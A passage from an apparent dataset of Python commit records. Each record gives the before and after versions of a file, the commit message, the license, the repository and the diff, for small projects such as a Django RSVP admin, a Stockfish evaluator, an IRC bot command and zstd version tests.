+ self.min_value != other.min_value,
+ self.max_value != other.max_value,
+ ])
+
+ def __contains__(self, x):
+ return self.min_value <= x <= self.max_value
def diff(self):
try:
|
7fdea303be0c3f182d0e99719c89975294112975
|
test/test_basic.py
|
test/test_basic.py
|
#!/usr/bin/env python
# vim: set ts=4 sw=4 et sts=4 ai:
#
# Test some basic functionality.
#
import unittest
import os
import sys
sys.path.append('..')
class TestQBasic(unittest.TestCase):
def setUp(self):
if os.path.exists('/tmp/q'):
os.remove('/tmp/q')
def tearDown(self):
self.setUp()
def assertInQLog(self, string):
self.assertTrue(os.path.exists('/tmp/q'))
logdata = open('/tmp/q', 'r').read()
try:
self.assertIn(string, logdata)
except AttributeError:
self.assertTrue(string in logdata)
def test_q_log_message(self):
import q
q.q('Test message')
self.assertInQLog('Test message')
def test_q_function_call(self):
import q
@q.t
def test(arg):
return 'RetVal'
self.assertEqual('RetVal', test('ArgVal'))
self.assertInQLog('ArgVal')
self.assertInQLog('RetVal')
unittest.main()
|
#!/usr/bin/env python
# vim: set ts=4 sw=4 et sts=4 ai:
#
# Test some basic functionality.
#
import unittest
import os
import sys
qpath = os.path.abspath(os.path.join(os.path.split(__file__)[0],'..'))
sys.path.insert(0, qpath)
class TestQBasic(unittest.TestCase):
def setUp(self):
if os.path.exists('/tmp/q'):
os.remove('/tmp/q')
def tearDown(self):
self.setUp()
def assertInQLog(self, string):
self.assertTrue(os.path.exists('/tmp/q'))
logdata = open('/tmp/q', 'r').read()
try:
self.assertIn(string, logdata)
except AttributeError:
self.assertTrue(string in logdata)
def test_q_log_message(self):
import q
q.q('Test message')
self.assertInQLog('Test message')
def test_q_function_call(self):
import q
@q.t
def test(arg):
return 'RetVal'
self.assertEqual('RetVal', test('ArgVal'))
self.assertInQLog('ArgVal')
self.assertInQLog('RetVal')
unittest.main()
|
Make test call location independent.
|
Make test call location independent.
|
Python
|
apache-2.0
|
zestyping/q
|
---
+++
@@ -7,7 +7,9 @@
import unittest
import os
import sys
-sys.path.append('..')
+
+qpath = os.path.abspath(os.path.join(os.path.split(__file__)[0],'..'))
+sys.path.insert(0, qpath)
class TestQBasic(unittest.TestCase):
|
2ee34d2d74a8fb41dfe49cd3933d0d7abb25fee4
|
rsvp/admin.py
|
rsvp/admin.py
|
from django.contrib import admin
from rsvp.models import Guest, Location, Table, Event, Hotel, Party, Song


class AdminModel(admin.ModelAdmin):
    """Shared admin base that lists only the model's ``name`` column."""
    list_display = ['name']


class GuestAdmin(admin.ModelAdmin):
    """Guest admin: searchable and filterable by name, save bar on top."""
    list_display = ['last_name', 'first_name']
    list_filter = ['last_name', 'first_name']
    search_fields = ['last_name', 'first_name', ]
    save_on_top = True


class LocationAdmin(AdminModel):
    pass


class TableAdmin(AdminModel):
    pass


class EventAdmin(AdminModel):
    pass


class HotelAdmin(AdminModel):
    pass


class PartyAdmin(admin.ModelAdmin):
    """Party admin: edit guests side-by-side, show response status."""
    filter_horizontal = ('guests',)
    list_display = ['name', 'responded']


class SongAdmin(admin.ModelAdmin):
    """Song admin: show title, artist and vote tally."""
    list_display = ['title', 'artist', 'votes']


# Register every model with its admin class in one pass (same order as before).
for _model, _admin in (
    (Guest, GuestAdmin),
    (Location, LocationAdmin),
    (Table, TableAdmin),
    (Event, EventAdmin),
    (Hotel, HotelAdmin),
    (Party, PartyAdmin),
    (Song, SongAdmin),
):
    admin.site.register(_model, _admin)
|
from django.contrib import admin
from rsvp.models import Guest, Location, Table, Event, Hotel, Party, Song


class AdminModel(admin.ModelAdmin):
    # Shared admin base: list only the model's ``name`` column.
    list_display = ['name']


class GuestAdmin(admin.ModelAdmin):
    # Guest admin: searchable/filterable by name; shows RSVP status.
    list_display = ['last_name', 'first_name', 'attending', ]
    list_filter = ['last_name', 'first_name']
    search_fields = ['last_name', 'first_name', ]
    save_on_top = True


class LocationAdmin(AdminModel):
    pass


class TableAdmin(AdminModel):
    pass


class EventAdmin(AdminModel):
    pass


class HotelAdmin(AdminModel):
    pass


class PartyAdmin(admin.ModelAdmin):
    # Parties expose a horizontal guest picker and their response status.
    filter_horizontal = ('guests',)
    list_display = ['name', 'responded']


class SongAdmin(admin.ModelAdmin):
    # Song requests are ranked by votes.
    list_display = ['title', 'artist', 'votes']


# Wire every model to its admin class.
admin.site.register(Guest, GuestAdmin)
admin.site.register(Location, LocationAdmin)
admin.site.register(Table, TableAdmin)
admin.site.register(Event, EventAdmin)
admin.site.register(Hotel, HotelAdmin)
admin.site.register(Party, PartyAdmin)
admin.site.register(Song, SongAdmin)
|
Add attending as column to Guest
|
Add attending as column to Guest
|
Python
|
mit
|
gboone/wedding.harmsboone.org,gboone/wedding.harmsboone.org
|
---
+++
@@ -5,7 +5,7 @@
list_display = ['name']
class GuestAdmin(admin.ModelAdmin):
- list_display = ['last_name', 'first_name']
+ list_display = ['last_name', 'first_name', 'attending', ]
list_filter = ['last_name', 'first_name']
search_fields = ['last_name', 'first_name', ]
save_on_top = True
|
181ac9d91d826b1c1a71ec14ff8f500cb79261d2
|
Code/Evaluator.py
|
Code/Evaluator.py
|
import subprocess

ENGINE_BIN = "stockfish"
DEPTH = 20


def evaluate_position(board, depth=DEPTH):
    """Evaluates the board's current position.

    Returns the Stockfish scalar score, at the given depth, in centipawns.

    :param board: position to evaluate; only ``board.fen()`` is used.
    :param depth: search depth in plies (defaults to ``DEPTH``).
    :return: score string taken from the engine's final info line.
    """
    engine = subprocess.Popen(ENGINE_BIN, bufsize=0, universal_newlines=True,
                              stdin=subprocess.PIPE, stdout=subprocess.PIPE)

    # take care of initial (credits) line
    engine.stdout.readline()

    # search from current position to the requested depth
    # (bug fix: the ``depth`` argument was previously ignored and the
    # module-level DEPTH constant used instead)
    engine.stdin.write("position fen " + board.fen() + "\n")
    engine.stdin.write("go depth " + str(depth) + "\n")

    # The engine streams "info ..." lines and finishes with "bestmove ...";
    # the line just before "bestmove" carries the final evaluation.
    last_line = ""
    while True:
        line = engine.stdout.readline().strip()
        if "bestmove" in line:
            break
        last_line = line

    engine.stdin.write("quit\n")
    # Bug fix: close the pipes and reap the child so repeated calls do not
    # leak file descriptors and zombie processes.
    engine.stdin.close()
    engine.stdout.close()
    engine.wait()

    # score in centipawns
    # NOTE(review): indexing field 9 assumes a fixed UCI "info ... score cp N"
    # layout; verify against actual engine output (e.g. "score mate" lines).
    score = last_line.split()[9]
    return score
|
import subprocess
import re

ENGINE_BIN = "stockfish"
DEPTH = 20


def evaluate_position(board, depth=DEPTH):
    """Evaluates the board's current position.

    Returns the Stockfish scalar score, at the given depth, in centipawns.

    :param board: position to evaluate; only ``board.fen()`` is used.
    :param depth: search depth in plies (defaults to ``DEPTH``).
    :return: int score in centipawns for the side to move.
    """
    engine = subprocess.Popen(ENGINE_BIN, bufsize=0, universal_newlines=True,
                              stdin=subprocess.PIPE, stdout=subprocess.PIPE)

    # take care of initial (credits) line
    engine.stdout.readline()

    # search from current position to the requested depth
    # (bug fix: the ``depth`` argument was previously ignored and the
    # module-level DEPTH constant used here and in the match below)
    engine.stdin.write("position fen " + board.fen() + "\n")
    engine.stdin.write("go depth " + str(depth) + "\n")

    # Wait for the exact-score info line at the requested depth.
    # NOTE(review): forced-mate positions report "score mate N" rather than
    # "score cp", which would make this loop spin forever — confirm callers
    # never evaluate such positions.
    while True:
        line = engine.stdout.readline().strip()
        if line.startswith("info") and (" depth " + str(depth)) in line \
                and "score cp" in line and "bound" not in line:
            break

    engine.stdin.write("quit\n")
    # Bug fix: close the pipes and reap the child so repeated calls do not
    # leak file descriptors and zombie processes.
    engine.stdin.close()
    engine.stdout.close()
    engine.wait()

    # score in centipawns
    # (bug fix: allow negative scores such as "score cp -35"; the previous
    # pattern "[0-9]+" failed to match them and crashed on .group())
    matcher = re.match(r".*score cp (-?[0-9]+).*", line)
    score = int(matcher.group(1))
    return score
|
Correct UCI parsing in board state evaluation function
|
Correct UCI parsing in board state evaluation function
|
Python
|
mit
|
Bojanovski/ChessANN
|
---
+++
@@ -1,4 +1,5 @@
import subprocess
+import re
ENGINE_BIN = "stockfish"
DEPTH = 20
@@ -19,17 +20,15 @@
engine.stdin.write("position fen "+board.fen()+"\n")
engine.stdin.write("go depth "+str(DEPTH)+"\n")
- last_line = ""
while True:
line = engine.stdout.readline().strip()
- if "bestmove" in line:
+ if line.startswith("info") and (" depth "+str(DEPTH)) in line \
+ and "score cp" in line and "bound" not in line:
break
- else:
- last_line = line
engine.stdin.write("quit\n")
# score in centipawns
- score = last_line.split()[9]
-
+ matcher = re.match(".*score cp ([0-9]+).*", line)
+ score = int(matcher.group(1))
return score
|
cda417454578cb8efe315850b06b047239c7796d
|
Commands/Leave.py
|
Commands/Leave.py
|
# -*- coding: utf-8 -*-
"""
Created on Dec 20, 2011
@author: Tyranic-Moron
"""
from IRCMessage import IRCMessage
from IRCResponse import IRCResponse, ResponseType
from CommandInterface import CommandInterface
import GlobalVars
class Leave(CommandInterface):
    # Command keywords that route to this handler.
    triggers = ['leave', 'gtfo']
    help = "leave/gtfo - makes the bot leave the current channel"

    def execute(self, message):
        """
        @type message: IRCMessage
        """
        # Only admins may eject the bot from a channel.
        if message.User.Name not in GlobalVars.admins:
            return IRCResponse(ResponseType.Say, 'Only my admins can tell me to %s' % message.Command, message.ReplyTo)

        # Any extra parameters become the PART message; otherwise use a default.
        if len(message.ParameterList) > 0:
            return IRCResponse(ResponseType.Raw, 'PART %s :%s' % (message.ReplyTo, message.Parameters), '')
        else:
            return IRCResponse(ResponseType.Raw, 'PART %s :toodles!' % message.ReplyTo, '')
|
# -*- coding: utf-8 -*-
"""
Created on Dec 20, 2011
@author: Tyranic-Moron
"""
from IRCMessage import IRCMessage
from IRCResponse import IRCResponse, ResponseType
from CommandInterface import CommandInterface
import GlobalVars
class Leave(CommandInterface):
    # Command keywords that route to this handler.
    triggers = ['leave', 'gtfo']
    help = "leave/gtfo - makes the bot leave the current channel"

    def execute(self, message):
        """Leave the current channel, optionally with a custom part message.

        @type message: IRCMessage
        """
        # Only admins may eject the bot from a channel.
        if message.User.Name not in GlobalVars.admins:
            # Bug fix: ``triggers`` is a class attribute, so referencing the
            # bare name raised NameError here; access it through ``self``.
            if message.Command == self.triggers[1]:
                return IRCResponse(ResponseType.Say, 'Wow, rude? Only my admins can tell me to {}'.format(message.Command), message.ReplyTo)
            else:
                return IRCResponse(ResponseType.Say, 'Only my admins can tell me to {}'.format(message.Command), message.ReplyTo)

        # Any extra parameters become the PART message; otherwise use a default.
        if len(message.ParameterList) > 0:
            return IRCResponse(ResponseType.Raw, 'PART {} :{}'.format(message.ReplyTo, message.Parameters), '')
        else:
            return IRCResponse(ResponseType.Raw, 'PART {} :toodles!'.format(message.ReplyTo), '')
|
Update % to .format, add response to gtfo command
|
Update % to .format, add response to gtfo command
|
Python
|
mit
|
MatthewCox/PyMoronBot,DesertBot/DesertBot
|
---
+++
@@ -20,9 +20,12 @@
@type message: IRCMessage
"""
if message.User.Name not in GlobalVars.admins:
- return IRCResponse(ResponseType.Say, 'Only my admins can tell me to %s' % message.Command, message.ReplyTo)
+ if message.Command == triggers[1]:
+ return IRCResponse(ResponseType.Say, 'Wow, rude? Only my admins can tell me to {}'.format(message.Command), message.ReplyTo)
+ else:
+ return IRCResponse(ResponseType.Say, 'Only my admins can tell me to {}'.format(message.Command), message.ReplyTo)
if len(message.ParameterList) > 0:
- return IRCResponse(ResponseType.Raw, 'PART %s :%s' % (message.ReplyTo, message.Parameters), '')
+ return IRCResponse(ResponseType.Raw, 'PART {} :{}'.format(message.ReplyTo, message.Parameters), '')
else:
- return IRCResponse(ResponseType.Raw, 'PART %s :toodles!' % message.ReplyTo, '')
+ return IRCResponse(ResponseType.Raw, 'PART {} :toodles!'.format(message.ReplyTo), '')
|
e5ed3e877e24d943096fa5e48c1f8c9bc30c3160
|
flask_annex/__init__.py
|
flask_annex/__init__.py
|
from .base import AnnexBase

__all__ = ('Annex',)


# -----------------------------------------------------------------------------

def get_annex_class(storage):
    """Return the annex implementation class for the *storage* backend name."""
    if storage != 'file':
        raise ValueError("unsupported storage {}".format(storage))
    from .file import FileAnnex
    return FileAnnex


# -----------------------------------------------------------------------------

class Annex(AnnexBase):
    """Storage-agnostic annex that forwards all work to a concrete backend."""

    def __init__(self, storage, **kwargs):
        # Proxy the actual implementation to prevent use of storage-specific
        # attributes when using the generic annex.
        annex_class = get_annex_class(storage)
        self._impl = annex_class(**kwargs)

    def save_file(self, key, filename):
        return self._impl.save_file(key, filename)

    def send_file(self, key, **options):
        return self._impl.send_file(key, **options)
|
from .base import AnnexBase
from . import utils

__all__ = ('Annex',)


# -----------------------------------------------------------------------------

def get_annex_class(storage):
    # Map a storage backend name to its implementation class; the import is
    # deferred so unused backends are never loaded.
    if storage == 'file':
        from .file import FileAnnex
        return FileAnnex
    else:
        raise ValueError("unsupported storage {}".format(storage))


# -----------------------------------------------------------------------------

class Annex(AnnexBase):
    def __init__(self, storage, **kwargs):
        annex_class = get_annex_class(storage)

        # Proxy the actual implementation to prevent use of storage-specific
        # attributes when using the generic annex.
        self._impl = annex_class(**kwargs)

    @classmethod
    def from_env(cls, namespace):
        """Build an Annex from environment variables under *namespace*."""
        storage = utils.get_config_from_env(namespace)['storage']

        # Use storage-specific env namespace when configuring a generic annex,
        # to avoid having unrecognized extra keys when changing storage.
        storage_namespace = '{}_{}'.format(namespace, storage.upper())
        storage_config = utils.get_config_from_env(storage_namespace)

        return cls(storage, **storage_config)

    def save_file(self, key, filename):
        # Delegate to the concrete backend.
        return self._impl.save_file(key, filename)

    def send_file(self, key, **options):
        # Delegate to the concrete backend.
        return self._impl.send_file(key, **options)
|
Use storage sub-namespace for generic annex
|
Use storage sub-namespace for generic annex
|
Python
|
mit
|
4Catalyzer/flask-annex,taion/flask-annex
|
---
+++
@@ -1,4 +1,5 @@
from .base import AnnexBase
+from . import utils
__all__ = ('Annex',)
@@ -24,6 +25,17 @@
# attributes when using the generic annex.
self._impl = annex_class(**kwargs)
+ @classmethod
+ def from_env(cls, namespace):
+ storage = utils.get_config_from_env(namespace)['storage']
+
+ # Use storage-specific env namespace when configuring a generic annex,
+ # to avoid having unrecognized extra keys when changing storage.
+ storage_namespace = '{}_{}'.format(namespace, storage.upper())
+ storage_config = utils.get_config_from_env(storage_namespace)
+
+ return cls(storage, **storage_config)
+
def save_file(self, key, filename):
return self._impl.save_file(key, filename)
|
f3c7504cf3c7982e295883ccf5448e19c1ba2814
|
pygraphc/anomaly/SentimentAnalysis.py
|
pygraphc/anomaly/SentimentAnalysis.py
|
from textblob import TextBlob


class SentimentAnalysis(object):
    """Get sentiment analysis with only positive and negative considered.

    Positive means normal logs and negative sentiment refers to possible attacks.
    This class uses sentiment analysis feature from the TextBlob library [Loria2016]_.

    References
    ----------
    .. [Loria2016] Steven Loria and the contributors, TextBlob: Simple, Pythonic, text processing--Sentiment analysis,
       part-of-speech tagging, noun phrase extraction, translation, and more.
       https://github.com/sloria/TextBlob/
    """
    def __init__(self, log_message):
        self.log_message = log_message

    def get_sentiment(self):
        """Get negative or positive sentiment.

        Returns
        -------
        sentiment_score : tuple
            A tuple containing (sentiment, polarity score).
        """
        # Non-negative polarity counts as 'positive'; anything below zero
        # as 'negative' — same split as the original if/elif chain.
        polarity = TextBlob(self.log_message).sentiment.polarity
        label = 'positive' if polarity >= 0. else 'negative'
        return (label, polarity)
|
from textblob import TextBlob


class SentimentAnalysis(object):
    """Get sentiment analysis with only positive and negative considered.

    Positive means normal logs and negative sentiment refers to possible attacks.
    This class uses sentiment analysis feature from the TextBlob library [Loria2016]_.

    References
    ----------
    .. [Loria2016] Steven Loria and the contributors, TextBlob: Simple, Pythonic, text processing--Sentiment analysis,
       part-of-speech tagging, noun phrase extraction, translation, and more.
       https://github.com/sloria/TextBlob/
    """
    def __init__(self, cluster_message):
        # cluster_message: dict mapping cluster id -> log message text
        # (presumably; confirm against callers).
        self.cluster_message = cluster_message

    def get_sentiment(self):
        """Get negative or positive sentiment.

        Default score for sentiment score is -1 to 1. The value that close to 1 means more positive and vice versa.

        Returns
        -------
        sentiment_score : dict
            A dictionary containing key: cluster id and value: sentiment score.
        """
        sentiment_score = {}
        for cluster_id, message in self.cluster_message.iteritems():
            # The original if/elif stored the identical value on both
            # branches, so a single assignment is equivalent.
            sentiment_score[cluster_id] = TextBlob(message).sentiment.polarity
        return sentiment_score

    def get_normalized_sentiment(self):
        """Get normalized sentiment score (min-max scaled into [0, 1]).

        Returns
        -------
        normalized_score : dict
            A dictionary containing key: cluster id and value: normalized sentiment score.
        """
        sentiment_score = self.get_sentiment()
        if not sentiment_score:
            # Bug fix: min()/max() on an empty collection raised ValueError.
            return {}

        min_score = min(sentiment_score.values())
        max_score = max(sentiment_score.values())
        score_range = max_score - min_score

        normalized_score = {}
        for cluster_id, score in sentiment_score.iteritems():
            if score_range == 0:
                # Bug fix: identical scores previously caused ZeroDivisionError.
                normalized_score[cluster_id] = 0.
            else:
                normalized_score[cluster_id] = (score - min_score) / score_range
        return normalized_score
|
Edit get_sentiment and add get_normalized_sentiment
|
Edit get_sentiment and add get_normalized_sentiment
|
Python
|
mit
|
studiawan/pygraphc
|
---
+++
@@ -13,22 +13,42 @@
part-of-speech tagging, noun phrase extraction, translation, and more.
https://github.com/sloria/TextBlob/
"""
- def __init__(self, log_message):
- self.log_message = log_message
+ def __init__(self, cluster_message):
+ self.cluster_message = cluster_message
def get_sentiment(self):
"""Get negative or positive sentiment.
+ Default score for sentiment score is -1 to 1. The value that close to 1 means more positive and vice versa.
+
Returns
-------
- sentiment_score : tuple
- A tuple containing (sentiment, polarity score).
+ sentiment_score : dict
+ A dictionary containing key: cluster id and value: sentiment score.
"""
- possible_sentiment = TextBlob(self.log_message)
- sentiment_score = None
- if possible_sentiment.sentiment.polarity >= 0.:
- sentiment_score = ('positive', possible_sentiment.sentiment.polarity)
- elif possible_sentiment.sentiment.polarity < 0.:
- sentiment_score = ('negative', possible_sentiment.sentiment.polarity)
+ sentiment_score = {}
+ for cluster_id, message in self.cluster_message.iteritems():
+ possible_sentiment = TextBlob(message)
+ if possible_sentiment.sentiment.polarity >= 0.:
+ sentiment_score[cluster_id] = possible_sentiment.sentiment.polarity
+ elif possible_sentiment.sentiment.polarity < 0.:
+ sentiment_score[cluster_id] = possible_sentiment.sentiment.polarity
return sentiment_score
+
+ def get_normalized_sentiment(self):
+ """Get normalized sentiment score.
+
+ Returns
+ -------
+ normalized_score : dict
+ A dictionary containing key: cluster id and value: normalized sentiment score.
+ """
+ sentiment_score = self.get_sentiment()
+ normalized_score = {}
+ min_score = min(sentiment_score.values())
+ max_score = max(sentiment_score.values())
+ for cluster_id, score in sentiment_score.iteritems():
+ normalized_score[cluster_id] = (score - min_score) / (max_score - min_score)
+
+ return normalized_score
|
3c93685eec3f6f293c3843d5c47b556426d4007e
|
test/settings/gyptest-settings.py
|
test/settings/gyptest-settings.py
|
#!/usr/bin/env python

# Copyright (c) 2011 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.

"""
Smoke-tests 'settings' blocks.
"""

import TestGyp

test = TestGyp.TestGyp()

test.run_gyp('settings.gyp')

# NOTE(review): run_gyp loads settings.gyp but the build targets test.gyp —
# confirm this mismatch is intentional.
test.build('test.gyp', test.ALL)

test.pass_test()
|
#!/usr/bin/env python

# Copyright (c) 2011 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.

"""
Smoke-tests 'settings' blocks.
"""

import TestGyp

# 'settings' is only supported for make and scons (and will be removed there as
# well eventually).
test = TestGyp.TestGyp(formats=['make', 'scons'])

test.run_gyp('settings.gyp')

# NOTE(review): run_gyp loads settings.gyp but the build targets test.gyp —
# confirm this mismatch is intentional.
test.build('test.gyp', test.ALL)

test.pass_test()
|
Make new settings test not run for xcode generator.
|
Make new settings test not run for xcode generator.
TBR=evan
Review URL: http://codereview.chromium.org/7472006
|
Python
|
bsd-3-clause
|
old8xp/gyp_from_google,old8xp/gyp_from_google,old8xp/gyp_from_google,old8xp/gyp_from_google,old8xp/gyp_from_google
|
---
+++
@@ -10,7 +10,9 @@
import TestGyp
-test = TestGyp.TestGyp()
+# 'settings' is only supported for make and scons (and will be removed there as
+# well eventually).
+test = TestGyp.TestGyp(formats=['make', 'scons'])
test.run_gyp('settings.gyp')
test.build('test.gyp', test.ALL)
test.pass_test()
|
314c6bf4159d4a84e76635a441fb62dba0122b2f
|
tests/test_version.py
|
tests/test_version.py
|
# Tests

import os

from tests.base import BaseTestZSTD


class TestZSTD(BaseTestZSTD):
    """Version consistency tests for the zstd bindings."""

    def setUp(self):
        # Allow testing against an externally provided libzstd.
        if os.getenv("ZSTD_EXTERNAL"):
            self.ZSTD_EXTERNAL = True
        self.VERSION = os.getenv("VERSION")
        self.PKG_VERSION = os.getenv("PKG_VERSION")
        # Pack "X.Y.Z" into X*100**2 + Y*100 + Z.
        # Bug fix: the components must be taken least-significant first,
        # i.e. reversed; sorting them by value (the old code) produced a
        # wrong number for any version such as "1.3.4".
        v = [int(n) for n in reversed(self.VERSION.split("."))]
        self.VERSION_INT = 0
        i = 0
        for n in v:
            self.VERSION_INT += n * 100 ** i
            i += 1

    def test_module_version(self):
        BaseTestZSTD.helper_version(self)

    def test_library_version(self):
        BaseTestZSTD.helper_zstd_version(self)

    def test_library_version_number(self):
        BaseTestZSTD.helper_zstd_version_number(self)


if __name__ == '__main__':
    # Bug fix: ``unittest`` was referenced here without ever being imported,
    # so running this module as a script raised NameError.
    import unittest
    unittest.main()
|
# Tests

import os

from tests.base import BaseTestZSTD, log


class TestZSTD(BaseTestZSTD):
    """Version consistency tests for the zstd bindings."""

    def setUp(self):
        # Allow testing against an externally provided libzstd.
        if os.getenv("ZSTD_EXTERNAL"):
            self.ZSTD_EXTERNAL = True
        self.VERSION = os.getenv("VERSION")
        self.PKG_VERSION = os.getenv("PKG_VERSION")
        log.info("VERSION=%r" % self.VERSION)
        log.info("PKG_VERSION=%r" % self.PKG_VERSION)
        # Pack "X.Y.Z" into X*100**2 + Y*100 + Z: components are taken
        # least-significant first, hence the reversal.
        v = [int(n) for n in reversed(self.VERSION.split("."))]
        log.info("v=%r" % (v,))
        self.VERSION_INT = 0
        i = 0
        for n in v:
            self.VERSION_INT += n * 100 ** i
            i += 1
        log.info("VERSION_INT=%r" % self.VERSION_INT)

    def test_module_version(self):
        BaseTestZSTD.helper_version(self)

    def test_library_version(self):
        BaseTestZSTD.helper_zstd_version(self)

    def test_library_version_number(self):
        BaseTestZSTD.helper_zstd_version_number(self)


if __name__ == '__main__':
    # Bug fix: ``unittest`` was referenced here without ever being imported,
    # so running this module as a script raised NameError.
    import unittest
    unittest.main()
|
Fix version tests - don't sort, just reverse
|
Fix version tests - don't sort, just reverse
|
Python
|
bsd-2-clause
|
sergey-dryabzhinsky/python-zstd,sergey-dryabzhinsky/python-zstd
|
---
+++
@@ -2,7 +2,7 @@
import os
-from tests.base import BaseTestZSTD
+from tests.base import BaseTestZSTD, log
class TestZSTD(BaseTestZSTD):
@@ -11,13 +11,16 @@
self.ZSTD_EXTERNAL = True
self.VERSION = os.getenv("VERSION")
self.PKG_VERSION = os.getenv("PKG_VERSION")
- v = [int(n) for n in self.VERSION.split(".")]
- v = sorted(v, reverse=True)
+ log.info("VERSION=%r" % self.VERSION)
+ log.info("PKG_VERSION=%r" % self.PKG_VERSION)
+ v = [int(n) for n in reversed(self.VERSION.split("."))]
+ log.info("v=%r" % (v,))
self.VERSION_INT = 0
i = 0
for n in v:
self.VERSION_INT += n * 100**i
i += 1
+ log.info("VERSION_INT=%r" % self.VERSION_INT)
def test_module_version(self):
BaseTestZSTD.helper_version(self)
|
0527cea9db518b5b8fb63fe2bb3792a806fa421d
|
src/python/setup.py
|
src/python/setup.py
|
__author__ = 'tom'

from setuptools import setup

# Makes use of the sphinx and sphinx-pypi-upload packages. To build for local development
# use 'python setup.py develop'. To upload a version to pypi use 'python setup.py clean sdist upload'.
# To build docs use 'python setup.py build_sphinx' and to upload docs to pythonhosted.org use
# 'python setup.py upload_sphinx'. Both uploads require 'python setup.py register' to be run, and will
# only work for Tom as they need the pypi account credentials.
setup(
    name='approxeng.input',
    version='0.6',
    description='Python game controller support using evDev for Raspberry Pi and other Linux systems',
    classifiers=['Programming Language :: Python :: 2.7'],
    url='https://github.com/ApproxEng/approxeng.input/',
    author='Tom Oinn',
    author_email='tomoinn@gmail.com',
    license='ASL2.0',
    packages=['approxeng.input'],
    # evdev supplies the Linux input-device bindings; version is pinned.
    install_requires=['evdev==0.5.0'],
    include_package_data=True,
    test_suite='nose.collector',
    tests_require=['nose'],
    dependency_links=[],
    zip_safe=False)
|
__author__ = 'tom'

from setuptools import setup

# Makes use of the sphinx and sphinx-pypi-upload packages. To build for local development
# use 'python setup.py develop'. To upload a version to pypi use 'python setup.py clean sdist upload'.
# To build docs use 'python setup.py build_sphinx' and to upload docs to pythonhosted.org use
# 'python setup.py upload_sphinx'. Both uploads require 'python setup.py register' to be run, and will
# only work for Tom as they need the pypi account credentials.
setup(
    name='approxeng.input',
    version='0.6',
    description='Python game controller support using evDev for Raspberry Pi and other Linux systems',
    classifiers=['Programming Language :: Python :: 2.7'],
    url='https://github.com/ApproxEng/approxeng.input/',
    author='Tom Oinn',
    author_email='tomoinn@gmail.com',
    license='ASL2.0',
    packages=['approxeng.input'],
    # evdev supplies the Linux input-device bindings; pinned to 0.6.4.
    install_requires=['evdev==0.6.4'],
    include_package_data=True,
    test_suite='nose.collector',
    tests_require=['nose'],
    dependency_links=[],
    zip_safe=False)
|
Change to use evdev 0.6.4
|
Change to use evdev 0.6.4
Signed-off-by: tom <3abfbc22eec6ecd173d744487905db1fa6a502d5@gmail.com>
|
Python
|
apache-2.0
|
ApproxEng/approxeng.input
|
---
+++
@@ -17,7 +17,7 @@
author_email='tomoinn@gmail.com',
license='ASL2.0',
packages=['approxeng.input'],
- install_requires=['evdev==0.5.0'],
+ install_requires=['evdev==0.6.4'],
include_package_data=True,
test_suite='nose.collector',
tests_require=['nose'],
|
faf067ec4f5189a7a0b12fc78b62373a8f997ac8
|
scripts/migration/migrate_index_for_existing_files.py
|
scripts/migration/migrate_index_for_existing_files.py
|
"""
Saves every file to have new save() logic index those files.
"""
import sys
import logging
from website.app import init_app
from website.files.models.osfstorage import OsfStorageFile
logger = logging.getLogger(__name__)
def main():
init_app(routes=False)
dry_run = 'dry' in sys.argv
logger.warn('Current files will now be updated to be indexed if necessary')
if dry_run:
logger.warn('Dry_run mode')
for file_ in OsfStorageFile.find():
logger.info('File with _id {0} and name {1} has been saved.'.format(file_._id, file_.name))
if not dry_run:
file_.save()
if __name__ == '__main__':
main()
|
"""
Saves every file to have new save() logic index those files.
"""
import sys
import logging
from website.app import init_app
from website.search import search
from website.files.models.osfstorage import OsfStorageFile
logger = logging.getLogger(__name__)
def main():
init_app(routes=False)
dry_run = 'dry' in sys.argv
logger.warn('Current files will now be updated to be indexed if necessary')
if dry_run:
logger.warn('Dry_run mode')
for file_ in OsfStorageFile.find():
logger.info('File with _id {0} and name {1} has been saved.'.format(file_._id, file_.name))
if not dry_run:
search.update_file(file_)
if __name__ == '__main__':
main()
|
Change migration to update_file rather than save it
|
Change migration to update_file rather than save it
|
Python
|
apache-2.0
|
billyhunt/osf.io,brianjgeiger/osf.io,zachjanicki/osf.io,brandonPurvis/osf.io,haoyuchen1992/osf.io,abought/osf.io,caseyrygt/osf.io,crcresearch/osf.io,mluo613/osf.io,caneruguz/osf.io,zamattiac/osf.io,danielneis/osf.io,leb2dg/osf.io,kwierman/osf.io,SSJohns/osf.io,aaxelb/osf.io,haoyuchen1992/osf.io,HalcyonChimera/osf.io,amyshi188/osf.io,rdhyee/osf.io,felliott/osf.io,saradbowman/osf.io,chennan47/osf.io,baylee-d/osf.io,CenterForOpenScience/osf.io,GageGaskins/osf.io,leb2dg/osf.io,mattclark/osf.io,felliott/osf.io,leb2dg/osf.io,binoculars/osf.io,binoculars/osf.io,kch8qx/osf.io,KAsante95/osf.io,alexschiller/osf.io,samchrisinger/osf.io,CenterForOpenScience/osf.io,GageGaskins/osf.io,cslzchen/osf.io,caseyrollins/osf.io,mluke93/osf.io,alexschiller/osf.io,zachjanicki/osf.io,KAsante95/osf.io,danielneis/osf.io,emetsger/osf.io,mluke93/osf.io,haoyuchen1992/osf.io,emetsger/osf.io,jnayak1/osf.io,laurenrevere/osf.io,mfraezz/osf.io,monikagrabowska/osf.io,acshi/osf.io,brandonPurvis/osf.io,HalcyonChimera/osf.io,jnayak1/osf.io,samchrisinger/osf.io,kch8qx/osf.io,mluo613/osf.io,samanehsan/osf.io,wearpants/osf.io,DanielSBrown/osf.io,hmoco/osf.io,caneruguz/osf.io,asanfilippo7/osf.io,baylee-d/osf.io,adlius/osf.io,Johnetordoff/osf.io,acshi/osf.io,Nesiehr/osf.io,alexschiller/osf.io,caseyrygt/osf.io,chrisseto/osf.io,abought/osf.io,aaxelb/osf.io,doublebits/osf.io,DanielSBrown/osf.io,caneruguz/osf.io,SSJohns/osf.io,GageGaskins/osf.io,emetsger/osf.io,felliott/osf.io,kch8qx/osf.io,TomHeatwole/osf.io,rdhyee/osf.io,Ghalko/osf.io,brandonPurvis/osf.io,monikagrabowska/osf.io,kch8qx/osf.io,doublebits/osf.io,ZobairAlijan/osf.io,Johnetordoff/osf.io,Ghalko/osf.io,acshi/osf.io,Johnetordoff/osf.io,brandonPurvis/osf.io,monikagrabowska/osf.io,crcresearch/osf.io,samanehsan/osf.io,laurenrevere/osf.io,wearpants/osf.io,samanehsan/osf.io,laurenrevere/osf.io,SSJohns/osf.io,pattisdr/osf.io,acshi/osf.io,felliott/osf.io,TomHeatwole/osf